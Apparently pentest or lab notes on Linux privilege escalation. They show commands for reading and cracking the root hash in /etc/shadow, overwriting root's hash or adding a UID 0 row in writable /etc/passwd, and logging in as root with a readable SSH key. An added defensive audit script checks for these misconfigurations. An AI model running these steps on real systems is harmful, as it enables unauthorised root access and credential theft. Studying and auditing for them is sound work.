Readable /etc/shadow

Enumeration

./lse.sh -l 1 -i | more
 
# Manual check
 
ls -l /etc/shadow

Root User Shadow extraction

head -n 1 /etc/shadow

Understanding the hash type

  1. $6$ indicates that the hash was generated using SHA-512 (sha512crypt)

Crack the hash

john --format=sha512crypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Switch user

su

Writable /etc/shadow

Make a backup

cp /etc/shadow /home/user/

Local machine

Generate SHA512 hash

mkpasswd -m sha-512 newpassword

Victim machine

 
vim /etc/shadow
 
# Replace the root user's password hash with the newly generated hash

Switch user

su

Writable /etc/passwd

On local machine

openssl passwd "password"

Victim machine

vim /etc/passwd

Replace the x in the root user's row with the generated password hash

su to switch.

## Alternatively, you can copy the root user's row and append it to the end of the file as a new root user with the generated password
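
From the defender's side, the conditions used in the sections above (world-readable or world-writable files, a hash placed in field 2 of /etc/passwd, an appended UID 0 account) can be audited with a short script. This is an added example, not part of the original notes; the function names are illustrative, and hash_scheme generalizes the $6$ prefix check to other common crypt(3) identifiers.

```shell
#!/usr/bin/env bash
# Added example: audit passwd/shadow-format files for the issues above.
# Function names are illustrative; paths are arguments so copies can be tested.

# Print which "other" permission bits are set on a file.
world_bits() {
  [ -n "$(find "$1" -prune -perm -0004 2>/dev/null)" ] && echo "world-readable"
  [ -n "$(find "$1" -prune -perm -0002 2>/dev/null)" ] && echo "world-writable"
  return 0
}

# Map a crypt(3) hash string to its scheme via the $id$ prefix.
hash_scheme() {
  case "$1" in
    '$1$'*) echo md5crypt ;;
    '$2a$'*|'$2b$'*|'$2y$'*) echo bcrypt ;;
    '$5$'*) echo sha256crypt ;;
    '$6$'*) echo sha512crypt ;;
    '$y$'*) echo yescrypt ;;
    *) echo unknown ;;
  esac
}

# Report passwd-format entries that need attention:
#   inline-hash     field 2 holds a hash instead of the "x" placeholder
#   empty-password  field 2 is empty (no password required)
#   extra-uid0      UID 0 account that is not named root
passwd_findings() {
  awk -F: '
    /^#/ || NF < 4 { next }
    $2 == "" { print "empty-password:" $1 }
    $2 != "" && $2 != "x" && $2 != "*" && $2 !~ /^!/ { print "inline-hash:" $1 }
    $3 == 0 && $1 != "root" { print "extra-uid0:" $1 }
  ' "$1"
}

# audit PASSWD_FILE SHADOW_FILE: print every finding prefixed with its file.
audit() {
  for f in "$1" "$2"; do
    world_bits "$f" | awk -v p="$f" '{ print p ": " $0 }'
  done
  passwd_findings "$1" | awk -v p="$1" '{ print p ": " $0 }'
}

# Run only when two paths are given, e.g. ./audit.sh /etc/passwd /etc/shadow
if [ "$#" -eq 2 ]; then audit "$1" "$2"; fi
```

hash_scheme can be applied to field 2 of a shadow entry to spot accounts still stored with a weak scheme such as md5crypt.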

SSH keys

Check if we can access id_rsa

Check if root login is allowed over ssh

grep PermitRootLogin /etc/ssh/sshd_config

Copy the key to the local machine

vim root_key
 
chmod 600 root_key
 
ssh -i root_key user@Ip